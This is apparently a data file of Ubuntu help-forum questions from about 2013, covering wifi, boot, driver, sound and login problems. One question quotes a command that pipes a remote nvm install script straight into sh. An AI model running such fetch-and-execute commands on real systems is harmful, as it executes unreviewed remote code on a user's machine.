297064	13.04 - random lag spikes on wifi	i get random lag spikes on my wifi connection . here 's what pinging a computer on the local network does : 64 bytes from 192.168.1.99 : icmp_req=10 ttl=64 time=2.06 ms 64 bytes from 192.168.1.99 : icmp_req=11 ttl=64 time=2.27 ms 64 bytes from 192.168.1.99 : icmp_req=12 ttl=64 time=2.98 ms 64 bytes from 192.168.1.99 : icmp_req=13 ttl=64 time=4.53 ms 64 bytes from 192.168.1.99 : icmp_req=19 ttl=64 time=1010 ms 64 bytes from 192.168.1.99 : icmp_req=20 ttl=64 time=4.66 ms 64 bytes from 192.168.1.99 : icmp_req=21 ttl=64 time=1.98 ms 64 bytes from 192.168.1.99 : icmp_req=22 ttl=64 time=2.02 ms i can ping that machine without any issues from other machines , both wired and wireless , so the network itself is fine . lspci : 08:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) this is such weird behavior i do n't know where to start looking for a solution .
297068	running gameranger on ubuntu 12.10	i have wine installed , and i 'm trying to run gamerangersetup.exe with wine , but it shows the following message on the terminal : err : module : import_dll library mfc42.dll ( which is needed by l '' z : \\home\\akash\\downloads\\utilities\\gameranger\\gamerangersetup.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' z : \\home\\akash\\downloads\\utilities\\gameranger\\gamerangersetup.exe '' failed , status c0000135 i do not know how to interpret the message . any help would be appreciated .
297069	ubuntu 13.04 hard disk does not boot	at the moment i have just 1 hard disk in my computer , with ubuntu 13.04 installed . it is not bootable . it is formatted with gpt , by gparted . ahci is enabled , secure boot is not enabled . ubuntu live dvd shows : ubuntu @ ubuntu : ~ $ sudo parted -l model : ata samsung hd154ui ( scsi ) disk /dev/sda : 1500gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 211mb 210mb fat32 boot 2 211mb 17.0gb 16.8gb ext4 3 17.0gb 27.5gb 10.5gb linux-swap ( v1 ) 4 27.5gb 342gb 315gb ext4 5 342gb 1500gb 1158gb ext4 warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! ubuntu @ ubuntu : ~ $ mount /dev/sda mount : ca n't find /dev/sda in /etc/fstab or /etc/mtab here 's the content of /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=f492ea82-fae6-462a-8ba1-87a2ee68dca8 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=1296-a193 /boot/efi vfat defaults 0 1 # /home was on /dev/sda4 during installation uuid=d9dbcc8f-d124-4a46-bf4f-34fe47d2fe28 /home ext4 defaults 0 2 # swap was on /dev/sda3 during installation uuid=04c5c345-b31a-4481-b354-76d51b40597b none swap sw 0 0 mount ca n't find sda1 in fstab . i have little experience with the live dd , perhaps i am doing something wrong ? ubuntu @ ubuntu : ~ $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' ubuntu 13.04 amd64 '' type= '' iso9660 '' /dev/sda1 : label= '' efisystem '' uuid= '' 1296-a193 '' type= '' vfat '' /dev/sda2 : uuid= '' f492ea82-fae6-462a-8ba1-87a2ee68dca8 '' type= '' ext4 '' /dev/sda3 : uuid= '' 04c5c345-b31a-4481-b354-76d51b40597b '' type= '' swap '' /dev/sda4 : uuid= '' d9dbcc8f-d124-4a46-bf4f-34fe47d2fe28 '' type= '' ext4 '' /dev/sda5 : label= '' data1 '' uuid= '' 40f5c447-0517-48d7-a2bc-5a972ee1899e '' type= '' ext4 '' { there is probably not a hardware problem : 2 days ago i had a working dual boot with 12.04 and windows7 on separate hard disks . i decided to put 13.04 on a 3rd hard disk , so that i could go on working with 12.04 while setting up 13.04 . this did n't work out . only after removing all other disks , windows 7 would repair itself . windows does n't boot without ahci , so ahci must be on if i want to use the hard disk with windows later } ok , i have repeated installation of 13.04 64 bit and let boot-repair repair it , because boot-repair found an efi this time . in http : //paste.ubuntu.com/5680216/ you find sda1 : __________________________________________ file system : vfat boot sector type : fat32 boot sector info : according to the info in the boot sector , sda1 starts at sector 0 . but according to the info from fdisk , sda1 starts at sector 2048 . operating system : boot files : /efi/boot/bootx64.efi /efi/ubuntu/grubx64.efi /efi/microsoft/boot/bootmgfw.efi /efi/microsoft/boot/bootx64.efi sda2 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab that looks ok , except there is no windows disk at the moment . i have just 1 disk with a half finished ubuntu install . plain ridiculous that this should not work . at pastebin we see : efi detected . please check the options . partition outside the disk detected . =================== final advice in case of recommended repair please do not forget to make your bios boot on sda1/efi/ ... /grub*.efi file ! so the bios should boot on the grubx64.efi in sda1/efi . is this correct ? perhaps i should do something to effect this , other than putting the harddisk as bootdisk ? there is an option to load an efi in the bios , but this doesn find anything when i boot from the harddisk i get a black screen with : reboot and select a proper device . mainboard : asrock z68 extreme3 gen3 , bios american megatrends
297070	wireless networks on ubuntu 12.10	i am unable to even view wireless networks on ubuntu 12.10 . i was using windows 8 intitally , and have a driver broadcom installed , yet i can not see any networks . do i need a different driver ?
297074	unable to connect to wifi - dell vostro 2420	i got a dell vostro 2420 laptop yesterday . it was connecting to wifi perfectly fine . today , i am unable to connect to the wifi network . the wireless icon also does n't show any curved lines . i am using ubuntu for the first time so i do n't know anything about it . here 's the output of rfkill list all : rfkill list all 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no i still can not connect .
297076	ubuntu server - bandwidth prioritising	my ubuntu server htpc runs a torrent client , and i also use it as a wifi bridge to connect my laptop to . there are no other devices on my network . it does not function as a router , i still use a standard router for security purposes , however all traffic goes through the server . i am looking to prioritise all non-torrent traffic , in the sense that torrenting traffic/ports are set as bulk . i know i can shape bandwidth and apply throttles , however this means i 'm not maximising my bandwidth/low speed . i currently have scheduling set up in my torrent client , but it is n't working very well - i am having to manually tweak and throttle on a daily basis , and after 3 months i 've found no reliable schedule that works for me . is there a way of doing such a thing other than applying basic throttling/shaping ?
297077	network device problem - ubuntu 13.04	my ubuntu suddenly does n't seem to have a wifi adapter..or any network adapater actually . i noticed this after i tried to connect to my office lan and changed set the lan settings . when i open 'network connections ' i get a message saying something like 'the device is not compatible with this service' i 've also just noticed another problem ..which i think will be better presented after this . so there it is ... any ideas friends ?
297079	ca n't run frama-c on 13.04 after installation	i have installed frama-c on 13.04 via apt-get . however , after installation , i can not run it . when i type frama-c in terminal ; nothing happens . also frama-c does n't appear in the dash ! i have checked software center and it was checked as installed and also i got output from frama-c -- version how can i detect the problem ?
297080	ubuntu open to black screen with blinking cursor after upgrading from 12.10 to 13.04	i upgraded my ubuntu os from 12.10 to 13.04 and after the process of upgrading it via software updater , it requested me to restart the computer . i restarted and on boot i proceed to the purple with ubuntu text and 4 dots below it and proceed to the black screen with a blinking underscore ( _ ) please help me , i have all my files in there and i ca n't access them .. i tried the grub menu edit that other questions pointed out but it doesnt seem to do anything . please helppp / :
297090	tagging files in nautilus	i would like to be able to add tags to images files by right clicking in the image file and be able to search by tags directly in nautilus without using an app like shotwell . is there anyway to do this ?
297092	unable to extend ubuntu partiton	i 'm trying to expand my ubuntu partition , i booted up my livecd , opened gparted and freed some space . but when i 'm trying to expand the partition , it does n't show any free space . it does this only for the ubuntu partition , other partitions can be expanded . /dev/sda11 is my ubuntu partition . i 'm also running a dual boot with windows on it .
297103	how to enable multisession in x11rdp ?	i am using x11rdp v0.6 . in the xrdp v0.5 multi-session was a choice by just changing the resolution . anyway , this is not the problem ... i just want to know how to enable multi-session in x11rdp 0.6 in ubuntu 12.04 ? i already tried to mess up with the sesman.ini and xrdp.ini but it seems something in other place must be done .
297104	multiple windows at qtcreator startup	i 'm using qtcreator for a while . no problems everything worked fine . but , when i started some hours before it opens with multiple windows named qtcreator along with one main qtcreator window . others were just frames of the desktop as shown in the image link below . what may be the problem ?
297107	powernap daemon does n't start with upstart	i have a problem with powernap daemon on kubuntu 13.04 , which does n't start with upstart ( or with /etc/init.d/powernap start ) . on my other machine with ubuntu 12.04.2 lts it starts ok. $ sudo service powernap start powernap stop/pre-start , process 8245 $ sudo service powernap status powernap stop/waiting i tried reinstalling powernap ( with purge ) , but the problem persists . the only way i managed to start powernap daemon is : $ sudo powernapd $ ps -e | grep powernap 21369 ? 00:00:00 powernapd the system is up-to-date .
297108	where on the filesytem could a user find the unity scope files ?	i am wanting to find the unity scope folder so that i can study how the scopes are set up and programmed . where on the filesytem could i find the unity scope files ?
297112	black screen after login with cursor	i have ubuntu 13.04 and one day ago i 've just installed updates , after i turned off my computer and then when i restarted i just can see a black screen with cursor after login . note : i can login . i 've tried to start with unity 2d but it does n't come with this ubuntu version , i 've installed but it was n't added to desktop managers options . also i 've tried to reinstall my ati drivers from a tty ( ctrl+alt+f1 ) . note . my graphics card is an ati 6850hd . please , help what can i do ?
297114	secure boot not enabled	i have q400a asus laptop , which was running windows 8 when i bought , i installed windows 7 as the main os for the system and windows 8 and ubuntu 12.04 running on side . i wan na try 13.04 so i download the file iso.img burn it on cd but when i run the cd it says , secure boot not enabled ! i have no clue what does this mean . can someone explain what it does and what it meant ? and also i already have partition ( i ) for ubuntu , how do i install it on that disk partition . all i see is 750gb it do n't mentioned any of the partition that i have . this is the output of bootinfoscript : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe /wubildr /wubildr.mbr sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe /wubildr sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 206,848 1,044,482,047 1,044,275,200 7 ntfs / exfat / hpfs /dev/sda3 1,044,482,048 1,260,343,295 215,861,248 7 ntfs / exfat / hpfs /dev/sda4 1,260,343,296 1,465,145,343 204,802,048 f w95 extended ( lba ) /dev/sda5 1,260,345,344 1,465,145,343 204,800,000 7 ntfs / exfat / hpfs guid partition table detected , but does not seem to be used . partition start sector end sector # of sectors system '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 aac60defc60dbc97 ntfs system reserved /dev/sda2 a2523d25523d0019 ntfs /dev/sda3 5a9c3f189c3eeddf ntfs /dev/sda5 205cc68a5cc659e4 ntfs new volume /dev/sr0 iso9660 ubuntu 13.04 amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =============================== stderr messages : =============================== no volume groups found
297117	usb datacard not getting detected	i have a usb datacard which worked well with the backtrack5r3 ( which is based on ubuntu 10.04lts ) but it is not getting detected in ubuntu 12.04lts/13.04 the usb modem which i have been using will be first mounted as a cd-rom with the drivers for windows version and the dial up script for linux . so to get connected to the internet i will eject/unmount the cdrom first and then dial up the connection . the actual problem here is the crom is not getting mounted . i have tried getting connected to internet using this method http : //ubuntuforums.org/showthread.php ? t=2028061 but it failed . thanks in advance .
297119	what password do you use when you 're installing software on a virtual machine running 13.04 ?	i am using windows 8 and through virtualbox i am running 13.04 and it would be just great if i could actually use it for what i wanted it : installing and running gnu octave . i ca n't seem to because when i attempt to install in the software centre i am missing one vital thing : a password . i downloaded it from here
297122	keyboard layout differs from my us intl	my hp probook has a us intl keyboard with eurosymbol on 5 , but left shift key is right next to 'z ' . that one is not available in my keyboard list . now my shift and ctrl keys are not working . is this keyboard so odd [ question mark ]
297131	'root ' user does not exist ?	when i run the su command , the terminal returns : user 'su ' does not exist.how do i add the root user ? can anyone answer this ? i tried sudo adduser su , but after this , i get the same problem .
297132	how to set desktop to show files and folders from different directory ?	currently , when all windows are minimized and closed , the desktop will show files and folders located in /home/user/desktop . i want to change this behavior and have my home folder be displayed for more useful access to my files and directories based on how i organize things . my question is , how can i tell unity/nautilus/whoever to display files and directories from a different folder on my desktop wallpaper ?
297139	no wallpaper after update	i updated the system from the software updater and it required restart , after the laptop restarting no wallpaper on the desktop even if i changed it like below any help ? ?
297141	ppa for android studio ?	android studio was released a few days ago and it 's still in early access preview , but i would like to know if there is any ppa i could add to my ubuntu raring to automatically keep it updated with apt-get ?
297146	live window resizing is very slow - ubuntu 12.10	live window resizing is very very slow , if i activate it through compiz config manager . i searched the web for a while , but found no reason why . it 's obviously an unity/compiz problem . the question is , is there an easy way to fix this ? is this also a problem in ubuntu 13.04 ? i need this feature for designing responsive websites . i love ubuntu , i use it since many years , so i do n't want to switch to an other operating system ...
297147	is it possible to run twinkle sip client under ubuntu 13.04 ?	we ca n't install twinkle under ubuntu 13.04 this program is very important to us !
297148	cancel ssh session to server	i use ssh to manage a server on my local network . ssh username @ 192.168.1.210 which works great . when i am finished in the server i normally just x out the command line window which fires a prompt telling me a process is running and closing will kill it . which is fine . i would however prefer a command i can use to gracefully close the ssh connect and bring the command line back to my local machine . is there such a thing ? or is x-ing out of the window the only way ?
297151	how to run 32-bit programs on a 64-bit system	recently i upgraded my netbook to ubuntu 13.04 64-bit from ubuntu 13.04 beta 2 32-bit . i want to be able to run 32-bit programs ( such as wps , which is a clone of ms office 2012 ) on my pc . how do i do it ? is there an easy way of doing it via the terminal ?
297153	upgraded to 13.04 , mount.cifs returns `` invalid argument '' -22 error	just upgraded my ubuntu server to 13.04 , and the existing and working fstab configuration for a cifs mount is failing with the generic -22 error ( invalid argument ) : 12:38 pm wesley at wsrv cwd ~ $ sudo mount /volumes/storage/ mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) this is the line at /etc/fstab : //10.0.0.1/storage /volumes/storage cifs uid=1000 , gid=1000 , user=wesley , password= [ hidden ] 0 0 the server is an airport extreme , other machines connect to it fine currently . this was working fine on 12.10 .
297159	how do i get the sound out of hdmi output on tv	my aplay -l command looks like this ** list of playback hardware devices ** card 0 : intel [ hda intel ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have also made asound.confg file in /etc but nothing seems to work .
297163	how to set up vpn connecton to access school research databases ?	i need to access some research databases over school ip address . it office of my school provided information how to setup vpn connection in windows ( control panel - > network connection - > create new connection - > and then we select `` connect to the network at my workplace '' - > `` virtual private network connection '' - > and we just type any connection name , while ip address was provided , as well as username and password ) . i followed similar steps in ubuntu 13.04 , but it always say connection failed ... any idea what am i doing wrong ?
297167	help with nvidia geforce 9400 gt ?	i just got my 13.04 running . however , i run off an almost ancient graphics card , the nvidia geforce 9400 gt , and it does n't support the dimensions for my card , is there any drivers i could possibly get ? i 've attempted looking in the driver update panel in the system settings , but no avail .
297170	how to install emacs 24.3 on ubuntu ?	this is my first time using ubuntu and i dont know how i should install a program on it . i tried using cd the directory where it is and then ./configure it but it is not working !
297172	problem with apt-get update and dpkg/status	first i got some problems with /var/lib/dpkg/status . i found a solution to remove this file and run apt-get update . removing this file worked well but after running update i always got this errormessagen ( sorry , german system , german errormessage ) : es wurden 200 kb in 4 s geholt ( 43,5 kb/s ) . w : fehlschlag beim holen von cdrom : //ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) /dists/raring/main/binary-i386/packages bitte verwenden sie apt-cdrom , um apt diese cd-rom bekannt zu machen . apt-get update kann nicht dazu verwendet werden , neue cd-roms hinzuzuf端gen . w : fehlschlag beim holen von cdrom : //ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) /dists/raring/restricted/binary-i386/packages bitte verwenden sie apt-cdrom , um apt diese cd-rom bekannt zu machen . apt-get update kann nicht dazu verwendet werden , neue cd-roms hinzuzuf端gen . e : einige indexdateien konnten nicht heruntergeladen werden . sie wurden ignoriert oder alte an ihrer stelle benutzt . how can i fix the problem with list file and executing update ?
297173	auto-configure network in ubuntu	while trying to set up nat to work with host-only adapter , i 've messed up the network config in ubuntu mini , and now it boots without network : ( do you know can i make ubuntu auto-configure itself like it did when i installed it ? is there a command for this ? i really do n't want to go through the installation process again : ( i did ifconfig -a and it showed eth5 . i remember that before it was eth0 . how can i get eth0 back/ nvm , found a solution here : http : //www.serenux.com/2009/11/howto-fix-a-missing-eth0-adapter-after-moving-ubuntu-server-from-one-box-to-another/ : )
297174	mouse moving and clicking on its own in 13.04	i recently upgraded from 12.10 where i had been having some mild touchpad problems . i 'm running an avatar mercury ultrabook with an elantech touchpad which refuses to support multitouch under 12.10 . when i hit 13.04 , on top of continued multitouch issues , upon booting the mouse moves itself about 300px directly left every two seconds and clicks where it lands . it will continue to march across the screen until it hits the side . if i disable the touchpad through the keyboard shortcut , it stops . i assume this is some sort of driver issue ?
297177	is there a loaded tour guide to edubuntu ?	i just installed edubuntu and the computer will go to a pair of young little girls , the system is already running bu i would like to show them a guided tour on how to use and discover edubuntu , i noticed there was a presentation slideshow while installing it but i just thought i could get access to it later on , now i just do n't find anything like it , if possible i need it in spanish . please help : )
297180	wine codec install problems	i 'm trying to follow this tutorial ( required plugin could not be found ) , and i stopped on installing codec on wine . i try to launch in wine the g2m_codec.exe and get this error : extractor error gotomeeting no arguments were provided to the extractor please help : x
297185	when installing updates , i do not get any progress indication	using lubuntu , when i install updates , update manager simply closes out after i authenticate . there is no progress indicator to tell me when the update are completed . i used to get a terminal window that showed how the updates were progressing , but that has stopped . anyway to get that original behavior back ?
297186	ca n't login to my user	i was installing nvm using this command : curl https : //raw.github.com/creationix/nvm/master/install.sh | sh as explained in the github page https : //github.com/creationix/nvm it did n't work , so i tried changing the line in ~/profile and not i can not login to my user ! when i try a wrong password i get a wrong password message . but , when i try the real password , it looks like it is logining and then just comming back to the login page again ( no bad password message ) - please help ! i 'm few weeks into ubuntu/linux , and it worked quite good until now . it 's ubuntu 13.04. thanks again .
297189	dummy sound output - no sound available	i 'm on ubuntu 12.04 for some reason , the sound output changed to `` dummy output '' . i have no idea why . me @ me-geforce6100pm-m2 : ~ $ hwinfo -- sound hal.1 : read hal dataprocess 2562 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 15 : pci 05.0 : 0403 audio device [ created at pci.318 ] unique id : cvwd.rqk7jdmxof7 sysfs id : /devices/pci0000:00/0000:00:05.0 sysfs busid : 0000:00:05.0 hardware class : sound model : `` nvidia mcp61 high definition audio '' vendor : pci 0x10de `` nvidia corporation '' device : pci 0x03f0 `` mcp61 high definition audio '' subvendor : pci 0x10de `` nvidia corporation '' subdevice : pci 0xcb84 revision : 0xa2 memory range : 0xfe024000-0xfe027fff ( rw , non-prefetchable ) irq : 22 ( no events ) module alias : `` pci : v000010ded000003f0sv000010desd0000cb84bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown also i installed pavucontrol i ran it , and on the configuration tab , it says 'no cards available for configuration ' . please help -- i have no sound ! thanks so much
297190	i ca n't access to my session	i try to log in my session but the login screen reappeared each time , the password is correctly entered . nb : the guest session is accessible
297194	where to find file tag options in ubuntu 12.04 ?	this link mentioned tags associated with files . http : //www.iloveubuntu.net/nautilus-receives-tags-ubuntu-1204-lts but i can not find it on my linux 12.04 . thanks in advance .
297197	black screen after clicking `` install ubuntu ''	i want to install the latest ubuntu ( 12.04.2 lts ) in my ultrabook asus s56c . i tried to boot with usb & cd , but both stuck in black screen after choosing `` try ubuntu ... '' or `` install ubuntu '' ... need some help . thanks
297198	remotely turning on computer ?	i need a simple way to turn on my dell optiplex remotely , and shut it off . its running ubuntu 13.04 . how would i go about that ? would i need a separate device to press the power button , or would it be as simple as installing a card to the machine ?
297199	problem installing modules for asus usb-n53 wifi adapter ?	i need some help please . i am a complete linux noob and find this pretty difficult stuff . that said , i have followed the above instructions and everything seems ok thru step 6 . however , when i try to install the module i get a few lines ok , then : make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop make : *** [ linux ] error 2 [ there are 3 * . i do n't know why only 1 shows ] how do i get around this .
297203	make terminal show up when called in a shell script	i am writing a shell script that will execute some application for a specific mime type , and it does it correctly , but when i have echo in my shell script , i dont see any terminal with the echoes message , is there any way to make the terminal show ?
297207	what is .profile~ ( not .profile )	i was trying to uninstall nvm , and saw i have a .profile~ file as well .profile - both have different content . what is the different between them ? thanks .
297208	windows installer	i have a windows 7 laptop ( lenovo t430u ) and have tried to install ubuntu alongside windows using the windows installer . it works fine and i can log into ubuntu once the install finishes . however once i restart the pc and select ubuntu at boot it goes into what appears to be the linux command line rather than booting to the ubuntu login screen . i 've tried re-installing using the windows installer but i get the same error/problem . i 've used ubuntu on my previous laptop using the installer with no problem . any ideas greatly appreciated , bearing in mind that i 'm not technical . david thomas
297209	connect to internet through 3g dongle in ubuntu server	as the title says , can i connect to internet through 3g dongle in ubuntu server fresh installation any terminal / manual way ? my purpose is to get connection using dongle in ubuntu server minimal install and i do n't have any other device to connect to . any input is appreciated , thank you .
297210	backlight fix in ubuntu with macbook 6,1 ?	i recently installed ubuntu to dual boot on my macbook . however , the brightness feature does not work ! it only happened after i changed the display driver . i am using ubuntu 13.04 lspci : 00:00.0 host bridge : nvidia corporation mcp79 host bridge ( rev b1 ) 00:00.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.0 isa bridge : nvidia corporation mcp79 lpc bridge ( rev b3 ) 00:03.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.2 smbus : nvidia corporation mcp79 smbus ( rev b1 ) 00:03.3 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.4 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.5 co-processor : nvidia corporation mcp79 co-processor ( rev b1 ) 00:04.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:04.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:06.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:06.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:08.0 audio device : nvidia corporation mcp79 high definition audio ( rev b1 ) 00:09.0 pci bridge : nvidia corporation mcp79 pci bridge ( rev b1 ) 00:0a.0 ethernet controller : nvidia corporation mcp79 ethernet ( rev b1 ) 00:0b.0 ide interface : nvidia corporation mcp79 sata controller ( rev b1 ) 00:10.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:15.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 02:00.0 vga compatible controller : nvidia corporation c79 [ geforce 9400m ] ( rev b1 ) 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) `jockey-text kmod : nvidia_173 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_310 - nvidia_310 ( proprietary , enabled , not in use ) kmod : nvidia_310_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : wl - broadcom sta wireless driver ( proprietary , enabled , in use ) [ auto-install ] kmod : nvidia_313_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_304_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_304 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) strangely the nvidia driver i am using is not showing up as in use from the output above . it is the nvidia binary xorg driver , kernel module and vdapu library from nvidia-310 how do i fix the brightness on the computer ?
297212	neverwinter nights does not run in 13.04	i installed neverwinter nights on this very machine while running 12.10 , following the instructions here . since upgrading to 13.04 , nwn hangs when i run it . this is a strace log file generated by my modified startup script . i have to kill nwn and kill -9 nwmain because it never unloads . no window ever opens . if i 'm reading the log correctly , it does n't find some libraries and then segfaults and hangs . i tried first with my unchanged installation created under 12.10 , then reinstalled fresh from the dvd but with no change . i seem to be having exactly the same problem as in the `` neverwinter nights does not run in 12.10 '' question on here ( not enough rep to link ) , but that was never resolved either . googling has yielded no similar reports for 13.04 . of the libraries i 've tried to manually verify the existence of , the only file i could n't actually find is ld.so . manpages.ubuntu.com does n't have an entry for it in 13.04 , interestingly . unfortunately i do n't know enough about how libraries work under linux to know if this has any bearing on my problem or is maybe just another xorg.conf , which no longer exists in its original form in ubuntu either . i 'm happy to provide any additional logs or information and i 'm no stranger to the terminal . vital stats : xubuntu 13.04 x86 on an asus x53e laptop intel core i5-2450m @ 2.50ghz 4gb ram intel integrated onboard graphics ( if model is important , i 'll have to reboot into win8 to check )
297216	id3 tag editor in 13.04	i have find some id3 tag editor in the web but unfortunately they are no longer available in 13.04 repository . can anyone give me some recommendation for id3 tag editor program ? i need some feature like tagging lots of files at once and able to read/write embedded ( not linked ) album art cover to/from mp3 files . and works in 13.04 , of course , many thanks !
297217	acer crystal eye webcam stopped working	i 'm not sure what went wrong , or what i did . but one day it suddenly was n't working . in cheese webcam booth it shows a black screen . the little camera light next to the webcam is n't switched on . in edit - > preferences- > webcam in the device dropdown it has `` acer crystal eye webcam ( /dev/video0 ) '' but the dropdown is disabled and greyed out . im on ubuntu 12.04.2 , on an acer travelmate 5320 matthew @ matthew-travelmate5320 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 5986:0105 acer , inc bus 002 device 002 : id 12d1:140c huawei technologies co. , ltd . bus 007 device 002 : id 04d9:0499 holtek semiconductor , inc. optical mouse matthew @ matthew-travelmate5320 : /var/log $ grep webcam dmesg* dmesg : [ 27.234010 ] uvcvideo : found uvc 1.00 device acer crystal eye webcam ( 5986:0105 ) dmesg : [ 27.295492 ] input : acer crystal eye webcam as /devices/pci0000:00/0000:00:1a.7/usb1/1-1/1-1:1.0/input/input5 dmesg.0 : [ 27.132769 ] uvcvideo : found uvc 1.00 device acer crystal eye webcam ( 5986:0105 ) dmesg.0 : [ 27.243793 ] input : acer crystal eye webcam as /devices/pci0000:00/0000:00:1a.7/usb1/1-1/1-1:1.0/input/input5 the webcam is working fine when i boot windows . any help would be much appreciated
297218	ubuntu gnome 13.04 bumped gnome 3.8 - software center crashing	running ubuntu gnome 13.04 and bumped gnome to 3.8 following the method given here : how to upgrade to gnome 3.8 in ubuntu 13.04 now every time i try to run the ubuntu software center app , it instantly crashes . here is the output : 2013-05-18 13:06:36,068 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-05-18 13:06:36,639 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.master was not provided by any .service files' 2013-05-18 13:06:36,832 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-05-18 13:06:36,834 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-05-18 13:06:36,838 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-05-18 13:06:36,838 - root - error - could not find any typelib for launchpadintegration 2013-05-18 13:06:36,869 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) ( software-center:11305 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 1978 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped ) any ideas what i need to do to fix this issue ?
